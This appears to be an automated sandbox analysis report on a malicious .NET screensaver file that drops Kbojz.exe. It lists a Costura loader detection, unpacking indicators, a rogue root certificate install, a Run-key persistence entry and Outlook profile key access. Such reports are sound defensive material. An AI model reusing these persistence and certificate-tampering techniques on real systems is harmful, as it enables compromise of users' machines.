Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: credssp.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: f2f5b5c0-4645-40a2-a057-694e3cbb601b<Module>costura.costura.dll.compressedcostura.dotnetzip.dll.compressedcostura.dotnetzip.pdb.compressedcostura.protobuf-net.dll.compressedDglpobuyba.g.resourcesaR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359148679.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.0000000003259000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.000000000386F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: p costura.dotnetzip.pdb.compressedt- source: Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: p costura.dotnetzip.pdb.compressed source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000023AB000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359148679.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.0000000003259000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.423329091.000000000386F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Dglpobuyba.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003830000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: p costura.dotnetzip.pdb.compressedlB source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434522188.0000000006180000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: p@costura.dotnetzip.pdb.compressed source: Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Program.cs	.Net Code: DisplayResult System.AppDomain.Load(byte[])
Source: Kbojz.exe.0.dr, Program.cs	.Net Code: DisplayResult System.AppDomain.Load(byte[])
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3209550.4.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3209550.4.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3209550.4.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3209550.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3209550.4.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.23d283c.1.raw.unpack, Program.cs	.Net Code: DisplayResult System.AppDomain.Load(byte[])
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 3.2.Kbojz.exe.37a86e0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Kbojz.exe.37efeb0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4cf0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.6010000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Kbojz.exe.37a86e0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.640000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3acec70.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3925230.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Kbojz.exe.3351590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Kbojz.exe.392fed0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.419873303.0000000000640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.420766544.00000000022E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359357988.0000000006010000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.356481377.00000000021F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.432614615.0000000004CF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.410066207.000000000392F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.410066207.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr PID: 3224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr PID: 3372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kbojz.exe PID: 3552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kbojz.exe PID: 3652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kbojz.exe PID: 3752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kbojz.exe PID: 3840, type: MEMORYSTR

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_046A35E8 push ebp; retf	0_2_046A35EF
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_046A3623 push ds; retf	0_2_046A3626
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_046A60C3 push 00000004h; iretd	0_2_046A60D0
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_046A7104 push esp; ret	0_2_046A7109
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_04C83E65 pushad ; ret	0_2_04C83E68
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_04C81B9B push ecx; retf	0_2_04C81B9C
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_058B3DB3 push ebx; ret	0_2_058B3DB4
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_058B6903 push edi; retf	0_2_058B6906
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_001E5370 push esp; ret	2_2_001E5379
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00609972 push edi; ret	2_2_00609973
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00609975 push edi; ret	2_2_00609993
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_0060995F push edi; ret	2_2_006099E3
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_0060995F push esi; ret	2_2_00609A43
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_0060995F push esi; ret	2_2_00609AA3
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_0060995F push esi; ret	2_2_00609AF3
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_0060995F push ebp; ret	2_2_00609B43
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_006099E0 push edi; ret	2_2_006099F3
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_006099A5 push esi; ret	2_2_00609A43
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_006099A5 push esi; ret	2_2_00609AA3
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_006099A5 push esi; ret	2_2_00609AE3
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_006099A5 push ebp; ret	2_2_00609B43
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00609995 push edi; ret	2_2_00609993
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00609995 push edi; ret	2_2_006099A3
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00609A72 push esi; ret	2_2_00609A73
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00609A45 push ebp; ret	2_2_00609B43
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00609AE0 push esi; ret	2_2_00609AF3
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00609B00 push ebp; ret	2_2_00609B43
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00608D33 push esp; ret	2_2_00608D38
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00608D14 push esp; ret	2_2_00608D19
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00608DFA push ebx; ret	2_2_00608DFB
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00608DC7 push ebx; ret	2_2_00608DC8

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File created: \ugs - cro req - khidubai (opl-841724).scr
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File created: \ugs - cro req - khidubai (opl-841724).scr			Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

File created: C:\Users\user\AppData\Roaming\Kbojz.exe

Jump to dropped file

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Kbojz			Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Kbojz			Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
